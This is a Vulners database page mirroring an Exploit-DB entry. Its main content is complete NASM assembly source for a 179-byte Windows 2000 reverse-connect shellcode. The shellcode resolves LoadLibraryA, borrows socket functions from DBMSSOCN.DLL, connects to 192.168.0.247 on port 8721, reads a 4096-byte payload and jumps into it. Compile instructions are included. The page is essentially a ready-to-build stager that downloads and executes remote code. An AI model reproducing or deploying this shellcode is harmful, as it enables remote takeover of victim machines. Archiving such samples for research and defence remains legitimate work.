Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Windows/x86 (2000) - Reverse TCP (192.168.0.247:8721/TCP) Connect + Vampiric Import Shellcode (179 bytes)

🗓️ 01 Jan 2009 00:00:00Reported by Exploit-DBType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 22 Views

Windows 2000 Vampiric Import Reverse Connect. Attach to dbmssocn.dll, use IAT to connect, read/exec payload. By hdm[at]metasploit.com

Code
;      Title:  Windows 2000 Vampiric Import Reverse Connect
;  Platforms:  Windows 2000
;   Function:  Attach to dbmssocn.dll, use IAT to connect, read/exec payload
;     Author:  hdm[at]metasploit.com

; Compile: nasm -f bin -o win2000_vampiric_connector.bin win2000_vampiric_connector.asm


[BITS 32]

%define ESIMOD add si, 0x3000
%define DBMSSOCN_WSAStartup [esi + 0x6C]
%define DBMSSOCN_connect    [esi + 0x4C]
%define DBMSSOCN_recv       [esi + 0x54]
%define DBMSSOCN_send       [esi + 0x5C]
%define DBMSSOCN_socket     [esi + 0x74]

; uncomment this for better error handling and persistent reconnects
; %define NICE

global _start
_start:

LKernel32Base:
    push byte 0x30
    pop ecx
    mov eax, [fs:ecx]
    mov eax, [eax + 0x0c] 
    mov esi, [eax + 0x1c] 
    lodsd				  
    mov ebp, [eax + 0x08] 

    mov eax, [ebp + 0x3c]           
    mov edx, [ebp + eax + 120]
    add edx, ebp                            
    mov ecx, [edx + 24]                     
    mov ebx, [edx + 32]
    add ebx, ebp

LFinderLoop:

%ifdef NICE
    jecxz LNotFound
%endif

    dec ecx
    mov esi, [ebx + ecx * 4]
    add esi, ebp                            
    xor edi, edi    
    cld

LHasher:
    xor eax, eax
    lodsb
    cmp al, ah
    je short LFound
    ror edi, 13
    add edi, eax
    jmp short LHasher

LFound:      
    cmp edi, 0xec0e4e8e     ; LoadLibraryA
    jnz short LFinderLoop
    mov ebx, [edx + 36]                     
    add ebx, ebp
    mov cx, [ebx + 2 * ecx]         
    mov ebx, [edx + 28]                     
    add ebx, ebp
    mov eax, [ebx + 4 * ecx]        
    add eax, ebp
    jmp short LFinderDone

%ifdef NICE
LNotFound:
    xor eax, eax
%endif 

LFinderDone:
    call LoadDBMSSOCN

LDataSegment:
;========================
db "DBMSSOCN.DLL"
db 0x00, 0xFF               ; second byte only added for easy disasm
;========================

LoadDBMSSOCN:                         
	call eax                ; LoadLibraryA (ptr to dll on stack)
    mov esi, eax            ; esi used by all DBMSSOCN functions
    ESIMOD                  ; inc base to save space on the calls
    xor edi, edi            ; edi is just a null
    
LWSAStartup:
    sub sp, 400
	push esp
	push dword 0x101
	call DBMSSOCN_WSAStartup

LSocket:
	push edi
	push edi
	push edi
	push edi
	inc edi
	push edi
	inc edi
	push edi
	call DBMSSOCN_socket
	mov ebx, eax

LConnect:
    push 0xF700A8C0         ; host: 192.168.0.247
    push 0x11220002         ; port: 8721     
	mov ecx, esp
	push byte 0x10
	push ecx
	push ebx
	call DBMSSOCN_connect   ; set eax to 0 on success

%ifdef NICE
    test eax,eax
    jnz LConnect
    xor eax, eax
%endif 
        
LReadCodeFromSocket:
    add di, 0xffe            ; read 4096 bytes of payload (edi == 2)
    sub esp, edi
    mov ebp, esp
    push eax               ; flags
    push edi               ; length
    push ebp               ; buffer
    push ebx               ; socket
    call DBMSSOCN_recv     ; recv(socket, buffer, length, flags)
    jmp esp                ; jump into new payload

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Jan 2009 00:00Current
7.1High risk
Vulners AI Score7.1
windows 2000reverse connectdbmssocn.dlliatmetasploit
22